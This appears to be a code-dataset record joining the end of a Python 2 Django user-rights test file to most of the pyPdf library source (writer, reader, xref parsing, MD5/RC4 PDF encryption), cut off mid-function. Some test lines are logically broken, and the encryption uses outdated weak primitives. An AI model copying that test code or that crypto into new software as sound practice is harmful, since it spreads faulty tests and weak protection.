self.assertTrue(user2.admin)
self.assertTrue(user2.userManager)
# User der keine createTable-Rechte hat kann eine Tabelle erstellen
def test_serializeAllWithRights(self):
user1 = UserFactory.createUserWithName("Gunther", "abc")
user2 = UserFactory.createUserWithName("Mammut", "abx")
table = StructureFactory.createTable(user1)
UserFactory.createTableRights(user1,table)
UserFactory.createTableRights(user2,table)
result = UserSerializer.serializeAllWithRights(user1)
print result
# ================================================================
# tests the name of the users
# ================================================================
self.assertTrue(user1.username in [user["name"] for user in result["users"]])
self.assertTrue(user2.username in [user["name"] for user in result["users"]])
# ================================================================
# tests the userright is given to the right user
# ================================================================
for user in result["users"]:
if user["name"] == user1.username:
self.assertFalse(user["tableCreator"])
self.assertTrue(user["active"])
self.assertFalse(user["admin"])
self.assertFalse(user["userManager"])
elif user["name"] == user2.username:
self.assertFalse(user["tableCreator"])
self.assertTrue(user["active"])
self.assertFalse(user["admin"])
self.assertFalse(user["userManager"])
def test_user(self):
user = UserFactory.createRandomUser(password="test")
c = Client()
c.login(username=user.username, password="test")
reqBody = dict()
reqBody["users"] = list()
for i in range(0,10):
reqBody['users'].append({"name": LiteralFactory.genRandString()})
userNames = list()
for users in reqBody["users"]:
userNames.append(users)
self.assertEquals(userNames, [users for users in reqBody["users"]])
response = c.get(path='/api/user/')
# self.assertEquals(userNames, [users for users["name"] in json.loads(response.content)["users"]])
print [users for users["name"] in json.loads(response.content)["users"]]
print userNames
| bsd-2-clause |
grundprinzip/rekind- | Resources/pyPdf/pdf.py | 2 | 63897 | # vim: sw=4:expandtab:foldmethod=marker
#
# Copyright (c) 2006, Mathieu Fenniak
# Copyright (c) 2007, Ashish Kulkarni <kulkarni.ashish@gmail.com>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
A pure-Python PDF library with very minimal capabilities. It was designed to
be able to split and merge PDF files by page, and that's about all it can do.
It may be a solid base for future PDF file work in Python.
"""
__author__ = "Mathieu Fenniak"
__author_email__ = "biziqe@mathieu.fenniak.net"
import struct
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import filters
import utils
import warnings
from generic import *
from utils import readNonWhitespace, readUntilWhitespace, ConvertFunctionsToVirtualList
from sets import ImmutableSet
##
# This class supports writing PDF files out, given pages produced by another
# class (typically {@link #PdfFileReader PdfFileReader}).
class PdfFileWriter(object):
def __init__(self):
self._header = "%PDF-1.3"
self._objects = [] # array of indirect objects
# The root of our page tree node.
pages = DictionaryObject()
pages.update({
NameObject("/Type"): NameObject("/Pages"),
NameObject("/Count"): NumberObject(0),
NameObject("/Kids"): ArrayObject(),
})
self._pages = self._addObject(pages)
# info object
info = DictionaryObject()
info.update({
NameObject("/Producer"): createStringObject(u"Python PDF Library - http://pybrary.net/pyPdf/")
})
self._info = self._addObject(info)
# root object
root = DictionaryObject()
root.update({
NameObject("/Type"): NameObject("/Catalog"),
NameObject("/Pages"): self._pages,
})
self._root = self._addObject(root)
def _addObject(self, obj):
self._objects.append(obj)
return IndirectObject(len(self._objects), 0, self)
def getObject(self, ido):
if ido.pdf != self:
raise ValueError("pdf must be self")
return self._objects[ido.idnum - 1]
##
# Adds a page to this PDF file. The page is usually acquired from a
# {@link #PdfFileReader PdfFileReader} instance.
# <p>
# Stability: Added in v1.0, will exist for all v1.x releases.
#
# @param page The page to add to the document. This argument should be
# an instance of {@link #PageObject PageObject}.
def addPage(self, page):
assert page["/Type"] == "/Page"
page[NameObject("/Parent")] = self._pages
page = self._addObject(page)
pages = self.getObject(self._pages)
pages["/Kids"].append(page)
pages[NameObject("/Count")] = NumberObject(pages["/Count"] + 1)
##
# Encrypt this PDF file with the PDF Standard encryption handler.
# @param user_pwd The "user password", which allows for opening and reading
# the PDF file with the restrictions provided.
# @param owner_pwd The "owner password", which allows for opening the PDF
# files without any restrictions. By default, the owner password is the
# same as the user password.
# @param use_128bit Boolean argument as to whether to use 128bit
# encryption. When false, 40bit encryption will be used. By default, this
# flag is on.
def encrypt(self, user_pwd, owner_pwd = None, use_128bit = True):
import md5, time, random
if owner_pwd == None:
owner_pwd = user_pwd
if use_128bit:
V = 2
rev = 3
keylen = 128 / 8
else:
V = 1
rev = 2
keylen = 40 / 8
# permit everything:
P = -1
O = ByteStringObject(_alg33(owner_pwd, user_pwd, rev, keylen))
ID_1 = md5.new(repr(time.time())).digest()
ID_2 = md5.new(repr(random.random())).digest()
self._ID = ArrayObject((ByteStringObject(ID_1), ByteStringObject(ID_2)))
if rev == 2:
U, key = _alg34(user_pwd, O, P, ID_1)
else:
assert rev == 3
U, key = _alg35(user_pwd, rev, keylen, O, P, ID_1, False)
encrypt = DictionaryObject()
encrypt[NameObject("/Filter")] = NameObject("/Standard")
encrypt[NameObject("/V")] = NumberObject(V)
if V == 2:
encrypt[NameObject("/Length")] = NumberObject(keylen * 8)
encrypt[NameObject("/R")] = NumberObject(rev)
encrypt[NameObject("/O")] = ByteStringObject(O)
encrypt[NameObject("/U")] = ByteStringObject(U)
encrypt[NameObject("/P")] = NumberObject(P)
self._encrypt = self._addObject(encrypt)
self._encrypt_key = key
##
# Writes the collection of pages added to this object out as a PDF file.
# <p>
# Stability: Added in v1.0, will exist for all v1.x releases.
# @param stream An object to write the file to. The object must support
# the write method, and the tell method, similar to a file object.
def write(self, stream):
import struct, md5
externalReferenceMap = {}
self.stack = []
self._sweepIndirectReferences(externalReferenceMap, self._root)
del self.stack
# Begin writing:
object_positions = []
stream.write(self._header + "\n")
for i in range(len(self._objects)):
idnum = (i + 1)
obj = self._objects[i]
object_positions.append(stream.tell())
stream.write(str(idnum) + " 0 obj\n")
key = None
if hasattr(self, "_encrypt") and idnum != self._encrypt.idnum:
pack1 = struct.pack("<i", i + 1)[:3]
pack2 = struct.pack("<i", 0)[:2]
key = self._encrypt_key + pack1 + pack2
assert len(key) == (len(self._encrypt_key) + 5)
md5_hash = md5.new(key).digest()
key = md5_hash[:min(16, len(self._encrypt_key) + 5)]
obj.writeToStream(stream, key)
stream.write("\nendobj\n")
# xref table
xref_location = stream.tell()
stream.write("xref\n")
stream.write("0 %s\n" % (len(self._objects) + 1))
stream.write("%010d %05d f \n" % (0, 65535))
for offset in object_positions:
stream.write("%010d %05d n \n" % (offset, 0))
# trailer
stream.write("trailer\n")
trailer = DictionaryObject()
trailer.update({
NameObject("/Size"): NumberObject(len(self._objects) + 1),
NameObject("/Root"): self._root,
NameObject("/Info"): self._info,
})
if hasattr(self, "_ID"):
trailer[NameObject("/ID")] = self._ID
if hasattr(self, "_encrypt"):
trailer[NameObject("/Encrypt")] = self._encrypt
trailer.writeToStream(stream, None)
# eof
stream.write("\nstartxref\n%s\n%%%%EOF\n" % (xref_location))
def _sweepIndirectReferences(self, externMap, data):
if isinstance(data, DictionaryObject):
for key, value in data.items():
origvalue = value
value = self._sweepIndirectReferences(externMap, value)
if isinstance(value, StreamObject):
# a dictionary value is a stream. streams must be indirect
# objects, so we need to change this value.
value = self._addObject(value)
data[key] = value
return data
elif isinstance(data, ArrayObject):
for i in range(len(data)):
value = self._sweepIndirectReferences(externMap, data[i])
if isinstance(value, StreamObject):
# an array value is a stream. streams must be indirect
# objects, so we need to change this value
value = self._addObject(value)
data[i] = value
return data
elif isinstance(data, IndirectObject):
# internal indirect references are fine
if data.pdf == self:
if data.idnum in self.stack:
return data
else:
self.stack.append(data.idnum)
realdata = self.getObject(data)
self._sweepIndirectReferences(externMap, realdata)
self.stack.pop()
return data
else:
newobj = externMap.get(data.pdf, {}).get(data.generation, {}).get(data.idnum, None)
if newobj == None:
newobj = data.pdf.getObject(data)
self._objects.append(None) # placeholder
idnum = len(self._objects)
newobj_ido = IndirectObject(idnum, 0, self)
if not externMap.has_key(data.pdf):
externMap[data.pdf] = {}
if not externMap[data.pdf].has_key(data.generation):
externMap[data.pdf][data.generation] = {}
externMap[data.pdf][data.generation][data.idnum] = newobj_ido
newobj = self._sweepIndirectReferences(externMap, newobj)
self._objects[idnum-1] = newobj
return newobj_ido
return newobj
else:
return data
##
# Initializes a PdfFileReader object. This operation can take some time, as
# the PDF stream's cross-reference tables are read into memory.
# <p>
# Stability: Added in v1.0, will exist for all v1.x releases.
#
# @param stream An object that supports the standard read and seek methods
# similar to a file object.
class PdfFileReader(object):
def __init__(self, stream):
self.flattenedPages = None
self.resolvedObjects = {}
self.read(stream)
self.stream = stream
self._override_encryption = False
##
# Retrieves the PDF file's document information dictionary, if it exists.
# Note that some PDF files use metadata streams instead of docinfo
# dictionaries, and these metadata streams will not be accessed by this
# function.
# <p>
# Stability: Added in v1.6, will exist for all future v1.x releases.
# @return Returns a {@link #DocumentInformation DocumentInformation}
# instance, or None if none exists.
def getDocumentInfo(self):
if not self.trailer.has_key("/Info"):
return None
obj = self.trailer['/Info']
retval = DocumentInformation()
retval.update(obj)
return retval
##
# Read-only property that accesses the {@link
# #PdfFileReader.getDocumentInfo getDocumentInfo} function.
# <p>
# Stability: Added in v1.7, will exist for all future v1.x releases.
documentInfo = property(lambda self: self.getDocumentInfo(), None, None)
##
# Retrieves XMP (Extensible Metadata Platform) data from the PDF document
# root.
# <p>
# Stability: Added in v1.12, will exist for all future v1.x releases.
# @return Returns a {@link #generic.XmpInformation XmlInformation}
# instance that can be used to access XMP metadata from the document.
# Can also return None if no metadata was found on the document root.
def getXmpMetadata(self):
try:
self._override_encryption = True
return self.trailer["/Root"].getXmpMetadata()
finally:
self._override_encryption = False
##
# Read-only property that accesses the {@link #PdfFileReader.getXmpData
# getXmpData} function.
# <p>
# Stability: Added in v1.12, will exist for all future v1.x releases.
xmpMetadata = property(lambda self: self.getXmpMetadata(), None, None)
##
# Calculates the number of pages in this PDF file.
# <p>
# Stability: Added in v1.0, will exist for all v1.x releases.
# @return Returns an integer.
def getNumPages(self):
if self.flattenedPages == None:
self._flatten()
return len(self.flattenedPages)
##
# Read-only property that accesses the {@link #PdfFileReader.getNumPages
# getNumPages} function.
# <p>
# Stability: Added in v1.7, will exist for all future v1.x releases.
numPages = property(lambda self: self.getNumPages(), None, None)
##
# Retrieves a page by number from this PDF file.
# <p>
# Stability: Added in v1.0, will exist for all v1.x releases.
# @return Returns a {@link #PageObject PageObject} instance.
def getPage(self, pageNumber):
## ensure that we're not trying to access an encrypted PDF
#assert not self.trailer.has_key("/Encrypt")
if self.flattenedPages == None:
self._flatten()
return self.flattenedPages[pageNumber]
##
# Read-only property that accesses the
# {@link #PdfFileReader.getNamedDestinations
# getNamedDestinations} function.
# <p>
# Stability: Added in v1.10, will exist for all future v1.x releases.
namedDestinations = property(lambda self:
self.getNamedDestinations(), None, None)
##
# Retrieves the named destinations present in the document.
# <p>
# Stability: Added in v1.10, will exist for all future v1.x releases.
# @return Returns a dict which maps names to {@link #Destination
# destinations}.
def getNamedDestinations(self, tree=None, retval=None):
if retval == None:
retval = {}
catalog = self.trailer["/Root"]
# get the name tree
if catalog.has_key("/Dests"):
tree = catalog["/Dests"]
elif catalog.has_key("/Names"):
names = catalog['/Names']
if names.has_key("/Dests"):
tree = names['/Dests']
if tree == None:
return retval
if tree.has_key("/Kids"):
# recurse down the tree
for kid in tree["/Kids"]:
self.getNamedDestinations(kid.getObject(), retval)
if tree.has_key("/Names"):
names = tree["/Names"]
for i in range(0, len(names), 2):
key = names[i].getObject()
val = names[i+1].getObject()
if isinstance(val, DictionaryObject) and val.has_key('/D'):
val = val['/D']
dest = self._buildDestination(key, val)
if dest != None:
retval[key] = dest
return retval
##
# Read-only property that accesses the {@link #PdfFileReader.getOutlines
# getOutlines} function.
# <p>
# Stability: Added in v1.10, will exist for all future v1.x releases.
outlines = property(lambda self: self.getOutlines(), None, None)
##
# Retrieves the document outline present in the document.
# <p>
# Stability: Added in v1.10, will exist for all future v1.x releases.
# @return Returns a nested list of {@link #Destination destinations}.
def getOutlines(self, node=None, outlines=None):
if outlines == None:
outlines = []
catalog = self.trailer["/Root"]
# get the outline dictionary and named destinations
if catalog.has_key("/Outlines"):
lines = catalog["/Outlines"]
if lines.has_key("/First"):
node = lines["/First"]
self._namedDests = self.getNamedDestinations()
if node == None:
return outlines
# see if there are any more outlines
while 1:
outline = self._buildOutline(node)
if outline:
outlines.append(outline)
# check for sub-outlines
if node.has_key("/First"):
subOutlines = []
self.getOutlines(node["/First"], subOutlines)
if subOutlines:
outlines.append(subOutlines)
if not node.has_key("/Next"):
break
node = node["/Next"]
return outlines
def _buildDestination(self, title, array):
page, typ = array[0:2]
array = array[2:]
return Destination(title, page, typ, *array)
def _buildOutline(self, node):
dest, title, outline = None, None, None
if node.has_key("/A") and node.has_key("/Title"):
# Action, section 8.5 (only type GoTo supported)
title = node["/Title"]
action = node["/A"]
if action["/S"] == "/GoTo":
dest = action["/D"]
elif node.has_key("/Dest") and node.has_key("/Title"):
# Destination, section 8.2.1
title = node["/Title"]
dest = node["/Dest"]
# if destination found, then create outline
if dest:
if isinstance(dest, ArrayObject):
outline = self._buildDestination(title, dest)
elif isinstance(dest, unicode) and self._namedDests.has_key(dest):
outline = self._namedDests[dest]
outline[NameObject("/Title")] = title
else:
raise utils.PdfReadError("Unexpected destination %r" % dest)
return outline
##
# Read-only property that emulates a list based upon the {@link
# #PdfFileReader.getNumPages getNumPages} and {@link #PdfFileReader.getPage
# getPage} functions.
# <p>
# Stability: Added in v1.7, and will exist for all future v1.x releases.
pages = property(lambda self: ConvertFunctionsToVirtualList(self.getNumPages, self.getPage),
None, None)
def _flatten(self, pages=None, inherit=None):
inheritablePageAttributes = (
NameObject("/Resources"), NameObject("/MediaBox"),
NameObject("/CropBox"), NameObject("/Rotate")
)
if inherit == None:
inherit = dict()
if pages == None:
self.flattenedPages = []
catalog = self.trailer["/Root"].getObject()
pages = catalog["/Pages"].getObject()
t = pages["/Type"]
if t == "/Pages":
for attr in inheritablePageAttributes:
if pages.has_key(attr):
inherit[attr] = pages[attr]
for page in pages["/Kids"]:
self._flatten(page.getObject(), inherit)
elif t == "/Page":
for attr,value in inherit.items():
# if the page has it's own value, it does not inherit the
# parent's value:
if not pages.has_key(attr):
pages[attr] = value
pageObj = PageObject(self)
pageObj.update(pages)
self.flattenedPages.append(pageObj)
def getObject(self, indirectReference):
retval = self.resolvedObjects.get(indirectReference.generation, {}).get(indirectReference.idnum, None)
if retval != None:
return retval
if indirectReference.generation == 0 and \
self.xref_objStm.has_key(indirectReference.idnum):
# indirect reference to object in object stream
# read the entire object stream into memory
stmnum,idx = self.xref_objStm[indirectReference.idnum]
objStm = IndirectObject(stmnum, 0, self).getObject()
assert objStm['/Type'] == '/ObjStm'
assert idx < objStm['/N']
streamData = StringIO(objStm.getData())
for i in range(objStm['/N']):
objnum = NumberObject.readFromStream(streamData)
readNonWhitespace(streamData)
streamData.seek(-1, 1)
offset = NumberObject.readFromStream(streamData)
readNonWhitespace(streamData)
streamData.seek(-1, 1)
t = streamData.tell()
streamData.seek(objStm['/First']+offset, 0)
obj = readObject(streamData, self)
self.resolvedObjects[0][objnum] = obj
streamData.seek(t, 0)
return self.resolvedObjects[0][indirectReference.idnum]
start = self.xref[indirectReference.generation][indirectReference.idnum]
self.stream.seek(start, 0)
idnum, generation = self.readObjectHeader(self.stream)
assert idnum == indirectReference.idnum
assert generation == indirectReference.generation
retval = readObject(self.stream, self)
# override encryption is used for the /Encrypt dictionary
if not self._override_encryption and self.isEncrypted:
# if we don't have the encryption key:
if not hasattr(self, '_decryption_key'):
raise Exception, "file has not been decrypted"
# otherwise, decrypt here...
import struct, md5
pack1 = struct.pack("<i", indirectReference.idnum)[:3]
pack2 = struct.pack("<i", indirectReference.generation)[:2]
key = self._decryption_key + pack1 + pack2
assert len(key) == (len(self._decryption_key) + 5)
md5_hash = md5.new(key).digest()
key = md5_hash[:min(16, len(self._decryption_key) + 5)]
retval = self._decryptObject(retval, key)
self.cacheIndirectObject(generation, idnum, retval)
return retval
def _decryptObject(self, obj, key):
if isinstance(obj, ByteStringObject) or isinstance(obj, TextStringObject):
obj = createStringObject(utils.RC4_encrypt(key, obj.original_bytes))
elif isinstance(obj, StreamObject):
obj._data = utils.RC4_encrypt(key, obj._data)
elif isinstance(obj, DictionaryObject):
for dictkey, value in obj.items():
obj[dictkey] = self._decryptObject(value, key)
elif isinstance(obj, ArrayObject):
for i in range(len(obj)):
obj[i] = self._decryptObject(obj[i], key)
return obj
def readObjectHeader(self, stream):
# Should never be necessary to read out whitespace, since the
# cross-reference table should put us in the right spot to read the
# object header. In reality... some files have stupid cross reference
# tables that are off by whitespace bytes.
readNonWhitespace(stream); stream.seek(-1, 1)
idnum = readUntilWhitespace(stream)
generation = readUntilWhitespace(stream)
obj = stream.read(3)
readNonWhitespace(stream)
stream.seek(-1, 1)
return int(idnum), int(generation)
def cacheIndirectObject(self, generation, idnum, obj):
if not self.resolvedObjects.has_key(generation):
self.resolvedObjects[generation] = {}
self.resolvedObjects[generation][idnum] = obj
def read(self, stream):
# start at the end:
stream.seek(-1, 2)
line = ''
while not line:
line = self.readNextEndLine(stream)
if line[:5] != "%%EOF":
raise utils.PdfReadError, "EOF marker not found"
# find startxref entry - the location of the xref table
line = self.readNextEndLine(stream)
startxref = int(line)
line = self.readNextEndLine(stream)
if line[:9] != "startxref":
raise utils.PdfReadError, "startxref not found"
# read all cross reference tables and their trailers
self.xref = {}
self.xref_objStm = {}
self.trailer = DictionaryObject()
while 1:
# load the xref table
stream.seek(startxref, 0)
x = stream.read(1)
if x == "x":
# standard cross-reference table
ref = stream.read(4)
if ref[:3] != "ref":
raise utils.PdfReadError, "xref table read error"
readNonWhitespace(stream)
stream.seek(-1, 1)
while 1:
num = readObject(stream, self)
readNonWhitespace(stream)
stream.seek(-1, 1)
size = readObject(stream, self)
readNonWhitespace(stream)
stream.seek(-1, 1)
cnt = 0
while cnt < size:
line = stream.read(20)
# It's very clear in section 3.4.3 of the PDF spec
# that all cross-reference table lines are a fixed
# 20 bytes. However... some malformed PDF files
# use a single character EOL without a preceeding
# space. Detect that case, and seek the stream
# back one character. (0-9 means we've bled into
# the next xref entry, t means we've bled into the
# text "trailer"):
if line[-1] in "0123456789t":
stream.seek(-1, 1)
offset, generation = line[:16].split(" ")
offset, generation = int(offset), int(generation)
if not self.xref.has_key(generation):
self.xref[generation] = {}
if self.xref[generation].has_key(num):
# It really seems like we should allow the last
# xref table in the file to override previous
# ones. Since we read the file backwards, assume
# any existing key is already set correctly.
pass
else:
self.xref[generation][num] = offset
cnt += 1
num += 1
readNonWhitespace(stream)
stream.seek(-1, 1)
trailertag = stream.read(7)
if trailertag != "trailer":
# more xrefs!
stream.seek(-7, 1)
else:
break
readNonWhitespace(stream)
stream.seek(-1, 1)
newTrailer = readObject(stream, self)
for key, value in newTrailer.items():
if not self.trailer.has_key(key):
self.trailer[key] = value
if newTrailer.has_key("/Prev"):
startxref = newTrailer["/Prev"]
else:
break
elif x.isdigit():
# PDF 1.5+ Cross-Reference Stream
stream.seek(-1, 1)
idnum, generation = self.readObjectHeader(stream)
xrefstream = readObject(stream, self)
assert xrefstream["/Type"] == "/XRef"
self.cacheIndirectObject(generation, idnum, xrefstream)
streamData = StringIO(xrefstream.getData())
idx_pairs = xrefstream.get("/Index", [0, xrefstream.get("/Size")])
entrySizes = xrefstream.get("/W")
for num, size in self._pairs(idx_pairs):
cnt = 0
while cnt < size:
for i in range(len(entrySizes)):
d = streamData.read(entrySizes[i])
di = convertToInt(d, entrySizes[i])
if i == 0:
xref_type = di
elif i == 1:
if xref_type == 0:
next_free_object = di
elif xref_type == 1:
byte_offset = di
elif xref_type == 2:
objstr_num = di
elif i == 2:
if xref_type == 0:
next_generation = di
elif xref_type == 1:
generation = di
elif xref_type == 2:
obstr_idx = di
if xref_type == 0:
pass
elif xref_type == 1:
if not self.xref.has_key(generation):
self.xref[generation] = {}
if not num in self.xref[generation]:
self.xref[generation][num] = byte_offset
elif xref_type == 2:
if not num in self.xref_objStm:
self.xref_objStm[num] = [objstr_num, obstr_idx]
cnt += 1
num += 1
trailerKeys = "/Root", "/Encrypt", "/Info", "/ID"
for key in trailerKeys:
if xrefstream.has_key(key) and not self.trailer.has_key(key):
self.trailer[NameObject(key)] = xrefstream.raw_get(key)
if xrefstream.has_key("/Prev"):
startxref = xrefstream["/Prev"]
else:
break
else:
# bad xref character at startxref. Let's see if we can find
# the xref table nearby, as we've observed this error with an
# off-by-one before.
stream.seek(-11, 1)
tmp = stream.read(20)
xref_loc = tmp.find("xref")
if xref_loc != -1:
startxref -= (10 - xref_loc)
continue
else:
# no xref table found at specified location
assert False
break
def _pairs(self, array):
i = 0
while True:
yield array[i], array[i+1]
i += 2
if (i+1) >= len(array):
break
def readNextEndLine(self, stream):
line = ""
while True:
x = stream.read(1)
stream.seek(-2, 1)
if x == '\n' or x == '\r':
while x == '\n' or x == '\r':
x = stream.read(1)
stream.seek(-2, 1)
stream.seek(1, 1)
break
else:
line = x + line
return line
##
# When using an encrypted / secured PDF file with the PDF Standard
# encryption handler, this function will allow the file to be decrypted.
# It checks the given password against the document's user password and
# owner password, and then stores the resulting decryption key if either
# password is correct.
# <p>
# It does not matter which password was matched. Both passwords provide
# the correct decryption key that will allow the document to be used with
# this library.
# <p>
# Stability: Added in v1.8, will exist for all future v1.x releases.
#
# @return 0 if the password failed, 1 if the password matched the user
# password, and 2 if the password matched the owner password.
#
# @exception NotImplementedError Document uses an unsupported encryption
# method.
def decrypt(self, password):
self._override_encryption = True
try:
return self._decrypt(password)
finally:
self._override_encryption = False
def _decrypt(self, password):
encrypt = self.trailer['/Encrypt'].getObject()
if encrypt['/Filter'] != '/Standard':
raise NotImplementedError, "only Standard PDF encryption handler is available"
if not (encrypt['/V'] in (1, 2)):
raise NotImplementedError, "only algorithm code 1 and 2 are supported"
user_password, key = self._authenticateUserPassword(password)
if user_password:
self._decryption_key = key
return 1
else:
rev = encrypt['/R'].getObject()
if rev == 2:
keylen = 5
else:
keylen = encrypt['/Length'].getObject() / 8
key = _alg33_1(password, rev, keylen)
real_O = encrypt["/O"].getObject()
if rev == 2:
userpass = utils.RC4_encrypt(key, real_O)
else:
val = real_O
for i in range(19, -1, -1):
new_key = ''
for l in range(len(key)):
new_key += chr(ord(key[l]) ^ i)
val = utils.RC4_encrypt(new_key, val)
userpass = val
owner_password, key = self._authenticateUserPassword(userpass)
if owner_password:
self._decryption_key = key
return 2
return 0
def _authenticateUserPassword(self, password):
encrypt = self.trailer['/Encrypt'].getObject()
rev = encrypt['/R'].getObject()
owner_entry = encrypt['/O'].getObject().original_bytes
p_entry = encrypt['/P'].getObject()
id_entry = self.trailer['/ID'].getObject()
id1_entry = id_entry[0].getObject()
if rev == 2:
U, key = _alg34(password, owner_entry, p_entry, id1_entry)
elif rev >= 3:
U, key = _alg35(password, rev,
encrypt["/Length"].getObject() / 8, owner_entry,
p_entry, id1_entry,
encrypt.get("/EncryptMetadata", BooleanObject(False)).getObject())
real_U = encrypt['/U'].getObject().original_bytes
return U == real_U, key
def getIsEncrypted(self):
return self.trailer.has_key("/Encrypt")
##
# Read-only boolean property showing whether this PDF file is encrypted.
# Note that this property, if true, will remain true even after the {@link
# #PdfFileReader.decrypt decrypt} function is called.
isEncrypted = property(lambda self: self.getIsEncrypted(), None, None)
def getRectangle(self, name, defaults):
retval = self.get(name)
if isinstance(retval, RectangleObject):
return retval
if retval == None:
for d in defaults:
retval = self.get(d)
if retval != None:
break
if isinstance(retval, IndirectObject):
retval = self.pdf.getObject(retval)
retval = RectangleObject(retval)
setRectangle(self, name, retval)
return retval
def setRectangle(self, name, value):
if not isinstance(name, NameObject):
name = NameObject(name)
self[name] = value
def deleteRectangle(self, name):
del self[name]
def createRectangleAccessor(name, fallback):
return \
property(
lambda self: getRectangle(self, name, fallback),
lambda self, value: setRectangle(self, name, value),
lambda self: deleteRectangle(self, name)
)
##
# This class represents a single page within a PDF file. Typically this object
# will be created by accessing the {@link #PdfFileReader.getPage getPage}
# function of the {@link #PdfFileReader PdfFileReader} class.
class PageObject(DictionaryObject):
def __init__(self, pdf):
DictionaryObject.__init__(self)
self.pdf = pdf
##
# Rotates a page clockwise by increments of 90 degrees.
# <p>
# Stability: Added in v1.1, will exist for all future v1.x releases.
# @param angle Angle to rotate the page. Must be an increment of 90 deg.
def rotateClockwise(self, angle):
assert angle % 90 == 0
self._rotate(angle)
return self
##
# Rotates a page counter-clockwise by increments of 90 degrees.
# <p>
# Stability: Added in v1.1, will exist for all future v1.x releases.
# @param angle Angle to rotate the page. Must be an increment of 90 deg.
def rotateCounterClockwise(self, angle):
assert angle % 90 == 0
self._rotate(-angle)
return self
def _rotate(self, angle):
currentAngle = self.get("/Rotate", 0)
self[NameObject("/Rotate")] = NumberObject(currentAngle + angle)
def _mergeResources(res1, res2, resource):
newRes = DictionaryObject()
newRes.update(res1.get(resource, DictionaryObject()).getObject())
page2Res = res2.get(resource, DictionaryObject()).getObject()
renameRes = {}
for key in page2Res.keys():
if newRes.has_key(key) and newRes[key] != page2Res[key]:
newname = NameObject(key + "renamed")
renameRes[key] = newname
newRes[newname] = page2Res[key]
elif not newRes.has_key(key):
newRes[key] = page2Res[key]
return newRes, renameRes
_mergeResources = staticmethod(_mergeResources)
def _contentStreamRename(stream, rename, pdf):
if not rename:
return stream
stream = ContentStream(stream, pdf)
for operands,operator in stream.operations:
for i in range(len(operands)):
op = operands[i]
if isinstance(op, NameObject):
operands[i] = rename.get(op, op)
return stream
_contentStreamRename = staticmethod(_contentStreamRename)
def _pushPopGS(contents, pdf):
# adds a graphics state "push" and "pop" to the beginning and end
# of a content stream. This isolates it from changes such as
# transformation matricies.
stream = ContentStream(contents, pdf)
stream.operations.insert(0, [[], "q"])
stream.operations.append([[], "Q"])
return stream
_pushPopGS = staticmethod(_pushPopGS)
##
# Merges the content streams of two pages into one. Resource references
# (i.e. fonts) are maintained from both pages. The mediabox/cropbox/etc
# of this page are not altered. The parameter page's content stream will
# be added to the end of this page's content stream, meaning that it will
# be drawn after, or "on top" of this page.
# <p>
# Stability: Added in v1.4, will exist for all future 1.x releases.
# @param page2 An instance of {@link #PageObject PageObject} to be merged
# into this one.
def mergePage(self, page2):
# First we work on merging the resource dictionaries. This allows us
# to find out what symbols in the content streams we might need to
# rename.
newResources = DictionaryObject()
rename = {}
originalResources = self["/Resources"].getObject()
page2Resources = page2["/Resources"].getObject()
for res in "/ExtGState", "/Font", "/XObject", "/ColorSpace", "/Pattern", "/Shading":
new, newrename = PageObject._mergeResources(originalResources, page2Resources, res)
if new:
newResources[NameObject(res)] = new
rename.update(newrename)
# Combine /ProcSet sets.
newResources[NameObject("/ProcSet")] = ArrayObject(
ImmutableSet(originalResources.get("/ProcSet", ArrayObject()).getObject()).union(
ImmutableSet(page2Resources.get("/ProcSet", ArrayObject()).getObject())
)
)
newContentArray = ArrayObject()
originalContent = self["/Contents"].getObject()
newContentArray.append(PageObject._pushPopGS(originalContent, self.pdf))
page2Content = page2['/Contents'].getObject()
page2Content = PageObject._contentStreamRename(page2Content, rename, self.pdf)
page2Content = PageObject._pushPopGS(page2Content, self.pdf)
newContentArray.append(page2Content)
self[NameObject('/Contents')] = ContentStream(newContentArray, self.pdf)
self[NameObject('/Resources')] = newResources
##
# Compresses the size of this page by joining all content streams and
# applying a FlateDecode filter.
# <p>
# Stability: Added in v1.6, will exist for all future v1.x releases.
# However, it is possible that this function will perform no action if
# content stream compression becomes "automatic" for some reason.
def compressContentStreams(self):
content = self["/Contents"].getObject()
if not isinstance(content, ContentStream):
content = ContentStream(content, self.pdf)
self[NameObject("/Contents")] = content.flateEncode()
##
# Locate all text drawing commands, in the order they are provided in the
# content stream, and extract the text. This works well for some PDF
# files, but poorly for others, depending on the generator used. This will
# be refined in the future. Do not rely on the order of text coming out of
# this function, as it will change if this function is made more
# sophisticated.
# <p>
# Stability: Added in v1.7, will exist for all future v1.x releases. May
# be overhauled to provide more ordered text in the future.
# @return a unicode string object
def extractText(self):
text = u""
content = self["/Contents"].getObject()
if not isinstance(content, ContentStream):
content = ContentStream(content, self.pdf)
# Note: we check all strings are TextStringObjects. ByteStringObjects
# are strings where the byte->string encoding was unknown, so adding
# them to the text here would be gibberish.
for operands,operator in content.operations:
if operator == "Tj":
_text = operands[0]
if isinstance(_text, TextStringObject):
text += _text
elif operator == "T*":
text += "\n"
elif operator == "'":
text += "\n"
_text = operands[0]
if isinstance(_text, TextStringObject):
text += operands[0]
elif operator == '"':
